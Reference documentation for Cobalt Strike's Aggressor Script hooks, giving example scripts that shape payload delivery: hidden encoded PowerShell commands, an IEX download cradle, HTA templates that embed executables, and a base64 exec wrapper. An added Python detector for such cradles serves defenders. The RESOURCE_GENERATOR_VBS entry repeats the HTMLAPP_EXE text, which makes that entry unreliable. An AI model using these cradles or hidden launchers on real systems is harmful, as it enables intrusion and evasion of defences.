Hooks

Hooks allow Aggressor Script to intercept and change Cobalt Strike behavior.

APPLET_SHELLCODE_FORMAT

Format shellcode before it's placed on the HTML page generated to serve the Signed or Smart Applet Attacks.

https://www.cobaltstrike.com/help-java-signed-applet-attack

Applet Kit

This hook is demonstrated in the Applet Kit. The Applet Kit is available via the Cobalt Strike Arsenal (Help -> Arsenal).

Example

set APPLET_SHELLCODE_FORMAT {
	return base64_encode($1);
}

EXECUTABLE_ARTIFACT_GENERATOR

Control the EXE and DLL generation for Cobalt Strike.

Arguments

$1 - the artifact file (e.g., artifact32.exe)
$2 - shellcode to embed into an EXE or DLL

Artifact Kit

This hook is demonstrated in the Artifact Kit:

https://www.cobaltstrike.com/help-artifact-kit

HTMLAPP_EXE

Controls the content of the HTML Application User-driven (EXE Output) generated by Cobalt Strike.

Arguments

$1 - the EXE data
$2 - the name of the .exe

Resource Kit

This hook is demonstrated in the Resource Kit:

https://www.cobaltstrike.com/help-resource-kit

Example

set HTMLAPP_EXE {
	local('$handle $data');
	$handle = openf(script_resource("template.exe.hta"));
	$data   = readb($handle, -1);
	closef($handle);

	$data   = strrep($data, '##EXE##', transform($1, "hex"));
	$data   = strrep($data, '##NAME##', $2);

	return $data;
}

HTMLAPP_POWERSHELL

Controls the content of the HTML Application User-driven (PowerShell Output) generated by Cobalt Strike.

Arguments

$1 - the PowerShell command to run

Resource Kit

This hook is demonstrated in the Resource Kit:

https://www.cobaltstrike.com/help-resource-kit

Example

set HTMLAPP_POWERSHELL {
	local('$handle $data');
	$handle = openf(script_resource("template.psh.hta"));
	$data   = readb($handle, -1);
	closef($handle);
	
	# push our command into the script
	return strrep($data, "%%DATA%%", $1);
}

POWERSHELL_COMMAND

Change the form of the PowerShell command run by Cobalt Strike's automation. This affects jump psexec_psh, powershell, and [host] -> Access -> One-liner.

Arguments

$1 - the PowerShell command to run.
$2 - true|false: whether the command is run on a remote target.

Resource Kit

This hook is demonstrated in the Resource Kit:

https://www.cobaltstrike.com/help-resource-kit

Example

set POWERSHELL_COMMAND {
	local('$script');
	$script = transform($1, "powershell-base64");
	
	# remote command (e.g., jump psexec_psh)
	if ($2) {
		return "powershell -nop -w hidden -encodedcommand $script";
	}
	# local command
	else {
		return "powershell -nop -exec bypass -EncodedCommand $script";
	}
}

POWERSHELL_COMPRESS

A hook used by the Resource Kit to compress a PowerShell script. The default uses gzip and returns a deflator script.

Resource Kit

This hook is demonstrated in the Resource Kit:

https://www.cobaltstrike.com/help-resource-kit

Arguments

$1 - the script to compress

POWERSHELL_DOWNLOAD_CRADLE

Change the form of the PowerShell download cradle used in Cobalt Strike's post-ex automation. This includes jump winrm|winrm64, [host] -> Access -> One Liner, and powershell-import.

Arguments

$1 - the URL of the (localhost) resource to reach

Resource Kit

This hook is demonstrated in the Resource Kit:

https://www.cobaltstrike.com/help-resource-kit

Example

set POWERSHELL_DOWNLOAD_CRADLE {
	return "IEX (New-Object Net.Webclient).DownloadString(' $+ $1 $+ ')";
}
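
Because POWERSHELL_COMMAND and POWERSHELL_DOWNLOAD_CRADLE let an operator change the literal strings shown above, detection is more durable when it normalizes the command line instead of matching those defaults. The Python below is an added example for defenders, not part of the Cobalt Strike documentation or kits: it resolves abbreviated PowerShell parameters, decodes the -EncodedCommand value (base64 over UTF-16LE) and looks for a WebClient download cradle. The names analyze, classify, PARAMS and CRADLE, the minimum prefix lengths, and the sample command lines are assumptions constructed for illustration.

```python
import base64
import re

# parameter -> (full name, shortest prefix accepted here, extra aliases)
PARAMS = {
    "NoProfile": ("noprofile", 3, ()),
    "WindowStyle": ("windowstyle", 1, ()),
    "ExecutionPolicy": ("executionpolicy", 2, ("ep",)),
    "EncodedCommand": ("encodedcommand", 1, ("ec",)),
}
CRADLE = re.compile(r"(?:iex|invoke-expression)\b.*?new-object\s+\S*net\.webclient"
                    r".*?\.downloadstring\(\s*['\"]([^'\"]+)['\"]", re.I | re.S)

def classify(token):
    """Map a command-line token to a PowerShell parameter name, or None."""
    name = token[1:].lower() if token[:1] in ("-", "/") else ""
    for param, (full, minlen, aliases) in PARAMS.items():
        if name in aliases or (len(name) >= minlen and full.startswith(name)):
            return param
    return None

def analyze(cmdline):
    """Return flags seen, the decoded -EncodedCommand script and any cradle URL."""
    tokens = cmdline.split()
    result = {"flags": set(), "script": None, "cradle_url": None}
    if not tokens or not re.search(r"(?i)powershell(\.exe)?$", tokens[0]):
        return result
    for i, tok in enumerate(tokens[1:], start=1):
        param = classify(tok)
        if param:
            result["flags"].add(param)
        if param == "EncodedCommand" and i + 1 < len(tokens):
            try:  # the value is base64 over UTF-16LE text
                raw = base64.b64decode(tokens[i + 1], validate=True)
                result["script"] = raw.decode("utf-16-le")
            except ValueError:  # bad base64 or bad UTF-16LE
                pass
    match = CRADLE.search(result["script"] or cmdline)
    result["cradle_url"] = match.group(1) if match else None
    return result

def _encode(script):  # used only to build the constructed samples below
    return base64.b64encode(script.encode("utf-16-le")).decode()

# Constructed command lines for illustration (not captured data; port is made up).
SAMPLES = [
    "powershell -nop -w hidden -encodedcommand " + _encode(
        "IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:8080/')"),
    "powershell.exe -NoP -Exec Bypass -e " + _encode("Get-Date"),
]
```

Feed analyze() the command-line field from process-creation telemetry; alerting on the decoded script and the cradle URL rather than on flag spelling keeps the rule valid when either hook is overridden.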

PSEXEC_SERVICE

Set the service name used by jump psexec|psexec64|psexec_psh and psexec.

Example

set PSEXEC_SERVICE {
	return "foobar";
}

PYTHON_COMPRESS

Compress a Python script generated by Cobalt Strike.

Arguments

$1 - the script to compress

Resource Kit

This hook is demonstrated in the Resource Kit:

https://www.cobaltstrike.com/help-resource-kit

Example

set PYTHON_COMPRESS {
	return "import base64; exec base64.b64decode(\"" . base64_encode($1) . "\")";
}

RESOURCE_GENERATOR

Control the format of the VBS template used in Cobalt Strike.

Resource Kit

This hook is demonstrated in the Resource Kit:

https://www.cobaltstrike.com/help-resource-kit

Arguments

$1 - the shellcode to inject and run

RESOURCE_GENERATOR_VBS

Controls the content of the HTML Application User-driven (EXE Output) generated by Cobalt Strike.

Arguments

$1 - the EXE data
$2 - the name of the .exe

Resource Kit

This hook is demonstrated in the Resource Kit:

https://www.cobaltstrike.com/help-resource-kit

Example

set HTMLAPP_EXE {
	local('$handle $data');
	$handle = openf(script_resource("template.exe.hta"));
	$data   = readb($handle, -1);
	closef($handle);

	$data   = strrep($data, '##EXE##', transform($1, "hex"));
	$data   = strrep($data, '##NAME##', $2);

	return $data;
}

SIGNED_APPLET_MAINCLASS

Specify the MAIN class of the Java Signed Applet Attack.

https://www.cobaltstrike.com/help-java-signed-applet-attack

Applet Kit

This hook is demonstrated in the Applet Kit. The Applet Kit is available via the Cobalt Strike Arsenal (Help -> Arsenal).

Example

set SIGNED_APPLET_MAINCLASS {
	return "Java.class";
}

SIGNED_APPLET_RESOURCE

Specify a Java Applet file to use for the Java Signed Applet Attack.

https://www.cobaltstrike.com/help-java-signed-applet-attack

Applet Kit

This hook is demonstrated in the Applet Kit. The Applet Kit is available via the Cobalt Strike Arsenal (Help -> Arsenal).

Example

set SIGNED_APPLET_RESOURCE {
	return script_resource("dist/applet_signed.jar");
}

SMART_APPLET_MAINCLASS

Specify the MAIN class of the Java Smart Applet Attack.

https://www.cobaltstrike.com/help-java-smart-applet-attack

Applet Kit

This hook is demonstrated in the Applet Kit. The Applet Kit is available via the Cobalt Strike Arsenal (Help -> Arsenal).

Example

set SMART_APPLET_MAINCLASS {
	return "Java.class";
}

SMART_APPLET_RESOURCE

Specify a Java Applet file to use for the Java Smart Applet Attack.

https://www.cobaltstrike.com/help-java-smart-applet-attack

Applet Kit

This hook is demonstrated in the Applet Kit. The Applet Kit is available via the Cobalt Strike Arsenal (Help -> Arsenal).

Example

set SMART_APPLET_RESOURCE {
	return script_resource("dist/applet_rhino.jar");
}